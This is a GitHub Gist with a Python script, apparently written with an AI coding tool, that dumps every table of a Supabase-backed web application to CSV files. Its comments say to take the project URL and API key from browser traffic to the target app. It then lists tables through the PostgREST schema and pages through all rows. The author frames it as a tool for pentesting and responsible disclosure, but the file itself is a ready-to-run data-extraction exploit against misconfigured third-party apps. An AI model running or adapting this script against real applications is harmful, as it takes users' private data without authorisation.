Last active
November 14, 2025 10:47
-
-
Save RichardoC/c17bb9268d7e1c36ccd4c5dff02f29b3 to your computer and use it in GitHub Desktop.
For dumping databases of vibe-coded applications while pentesting them/doing responsible disclosure
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Supabase Database Backup Script | |
| Discovers all tables and exports each to a separate CSV file. | |
| No external dependencies required - uses only Python standard library. | |
| Vibe coded with Claude Code | |
| """ | |
| import urllib.request | |
| import urllib.error | |
| import json | |
| import csv | |
| import sys | |
| from typing import List, Dict, Any | |
| # Supabase configuration (extracted from HAR file) | |
| SUPABASE_URL = "https://example.supabase.co" # find from the api calls your browser made to the vibe-coded application | |
| API_KEY = "REDACTED" # find from the api calls your browser made to the vibe-coded application - it's in the apikey header | |
| def make_request(url: str, headers: Dict[str, str]) -> Any: | |
| """Make HTTP request and return JSON response.""" | |
| try: | |
| req = urllib.request.Request(url, headers=headers) | |
| with urllib.request.urlopen(req) as response: | |
| return json.loads(response.read().decode('utf-8')) | |
| except urllib.error.HTTPError as e: | |
| print(f"HTTP Error {e.code}: {e.reason}") | |
| print(f"URL: {url}") | |
| print(f"Response: {e.read().decode('utf-8')}") | |
| return None | |
| except Exception as e: | |
| print(f"Error making request: {e}") | |
| return None | |
| def discover_tables() -> List[str]: | |
| """ | |
| Discover all available tables by fetching the OpenAPI schema. | |
| PostgREST exposes an OpenAPI spec that lists all available endpoints/tables. | |
| """ | |
| print("Discovering tables...") | |
| headers = { | |
| 'apikey': API_KEY, | |
| 'Authorization': f'Bearer {API_KEY}', | |
| 'Accept': 'application/openapi+json' | |
| } | |
| # Get OpenAPI schema from PostgREST root endpoint | |
| schema = make_request(SUPABASE_URL + '/rest/v1/', headers) | |
| if not schema or 'paths' not in schema: | |
| print("Warning: Could not fetch OpenAPI schema. Trying alternative method...") | |
| # Fallback: try common table names found in HAR file | |
| return ['sessions', 'feedback', 'leaderboard'] | |
| # Extract table names from the paths | |
| tables = [] | |
| for path in schema.get('paths', {}).keys(): | |
| # Paths are like "/{table_name}" | |
| if path.startswith('/') and '{' not in path: | |
| table_name = path.strip('/') | |
| if table_name and table_name not in ['rpc']: # Skip RPC endpoint | |
| tables.append(table_name) | |
| print(f"Discovered {len(tables)} tables: {', '.join(tables)}") | |
| return tables | |
| def fetch_table_data(table_name: str) -> List[Dict[str, Any]]: | |
| """Fetch all data from a table.""" | |
| print(f"Fetching data from '{table_name}'...", end=' ') | |
| headers = { | |
| 'apikey': API_KEY, | |
| 'Authorization': f'Bearer {API_KEY}', | |
| 'Content-Type': 'application/json', | |
| 'Prefer': 'return=representation' | |
| } | |
| all_data = [] | |
| offset = 0 | |
| limit = 1000 # Fetch in batches of 1000 | |
| while True: | |
| # Construct URL with pagination | |
| url = f"{SUPABASE_URL}/rest/v1/{table_name}?select=*&limit={limit}&offset={offset}" | |
| data = make_request(url, headers) | |
| if data is None: | |
| print(f"Failed to fetch data from '{table_name}'") | |
| return [] | |
| if not data: # Empty response means we've fetched all data | |
| break | |
| all_data.extend(data) | |
| # Check if we got fewer rows than the limit (means we're done) | |
| if len(data) < limit: | |
| break | |
| offset += limit | |
| print(f"fetched {len(all_data)} rows") | |
| return all_data | |
| def export_to_csv(table_name: str, data: List[Dict[str, Any]]) -> None: | |
| """Export table data to a CSV file.""" | |
| if not data: | |
| print(f" No data to export for '{table_name}'") | |
| return | |
| filename = f"{table_name}.csv" | |
| try: | |
| # Get all unique column names from the data | |
| columns = set() | |
| for row in data: | |
| columns.update(row.keys()) | |
| columns = sorted(list(columns)) | |
| # Write CSV file | |
| with open(filename, 'w', newline='', encoding='utf-8') as csvfile: | |
| writer = csv.DictWriter(csvfile, fieldnames=columns) | |
| writer.writeheader() | |
| writer.writerows(data) | |
| print(f" Exported to '{filename}'") | |
| except Exception as e: | |
| print(f" Error exporting '{table_name}': {e}") | |
| def main(): | |
| """Main backup function.""" | |
| print("=" * 60) | |
| print("Supabase Database Backup") | |
| print("=" * 60) | |
| print() | |
| # Discover all tables | |
| tables = discover_tables() | |
| if not tables: | |
| print("Error: No tables found!") | |
| sys.exit(1) | |
| print() | |
| print("Starting backup...") | |
| print() | |
| # Backup each table | |
| successful_backups = 0 | |
| for table_name in tables: | |
| data = fetch_table_data(table_name) | |
| if data: | |
| export_to_csv(table_name, data) | |
| successful_backups += 1 | |
| else: | |
| print(f" Skipped '{table_name}' (no data or error)") | |
| print() | |
| print("=" * 60) | |
| print(f"Backup complete! Successfully backed up {successful_backups}/{len(tables)} tables") | |
| print("=" * 60) | |
| if __name__ == "__main__": | |
| main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment